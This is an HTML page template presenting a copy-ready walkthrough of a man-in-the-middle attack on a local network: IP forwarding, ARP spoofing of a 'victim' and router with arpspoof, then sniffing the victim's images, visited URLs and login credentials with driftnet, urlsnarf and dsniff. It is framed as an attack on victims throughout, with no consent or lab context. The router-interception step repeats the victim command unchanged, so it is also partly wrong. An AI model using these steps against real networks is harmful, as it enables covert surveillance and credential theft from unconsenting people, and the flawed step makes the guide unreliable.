{% extends  'Projects/main.html'%}
{%block cont%}
 <div class="media-body">
   <ol class="list-group">
     <li class="list-group-item"><h2>Packet Forwarding</h2><br>
     Forwarding IPv4 packets using command:<br>
     <br><div class="code card bg-dark text-white">
       <div class="card-body">sysctl -w net.ipv4.ip_forward=1 </div><span class = "tooltiptext">Copy it!</span></div></li>
     <li class="list-group-item"><h2>Intercept victim Package</h2><br>
     We are using arspoof for interception.The structure of the command to start intercepting packets from the victim to the router is the following:
     <br><br><div class="code card bg-dark text-white">
       <div class="card-body">arpspoof -i [Network Interface Name] -t [Victim IP] [Router IP] </div><span class = "tooltiptext">Copy it!</span></div></li>
     <li class="list-group-item"><h2>Intercept router Package</h2><br>
      Now that we're intercepting packets from the victim to the router, we need now to intercept the packets from the victim to the router
     <br><br><div class="code card bg-dark text-white">
     <div class="card-body">arpspoof -i [Network Interface Name] -t [Victim IP] [Router IP] </div><span class = "tooltiptext">Copy it!</span></div></li>
     <li class="list-group-item"><h2>Image Sniffing</h2><br>
     To see the images from websites that our victim visits, you need to use driftnet. Driftnet is a program which listens to network traffic and picks out images from TCP streams it observes. Fun to run on a host which sees lots of web traffic.The strucure of the command to start driftnet and see the images that the user see on the websites is the following:
     <br><br><div class="code card bg-dark text-white">
       <div class="card-body">driftnet -i [Network Interface Name] </div><span class = "tooltiptext">Copy it!</span></div>
     </li>
     <li class="list-group-item"><h2>URLs Sniffing</h2><br>
     To get information about the websites that our victim visits, you can use urlsnarf for it. It is a command line tool that sniffs HTTP requests in Common Log Format. It outputs all requested URLs sniffed from HTTP traffic in CLF (Common Log Format, used by almost all web servers), suitable for offline post-processing with your favorite web log analysis tool (analog, wwwstat, etc.). The structure of the command to sniff the URLs that your victim visits, is the following:
     <br><br><div class="code card bg-dark text-white">
       <div class="card-body">urlsnarf -i [Network interface name] </div><span class = "tooltiptext">Copy it!</span></div>
     </li>
     <li class="list-group-item"><h2>Dsniff</h2><br>
       To sniff out authentication information like user credentials.
     <br><br><div class="code card bg-dark text-white">
       <div class="card-body">dsniff </div><span class = "tooltiptext">Copy it!</span></div>
     </li>
     <li class="list-group-item"><h2>Departing</h2><br>
     Once you are done with your attack (you don't want to sniff anymore), remember to disable the packet forwarding in the system again executing the following command on a terminal:
     <br><br><div class="code card bg-dark text-white">
       <div class="card-body">sysctl -w net.ipv4.ip_forward=0 </div><span class = "tooltiptext">Copy it!</span></div>
     </li>
   </ol>
  </div>
{%endblock%}
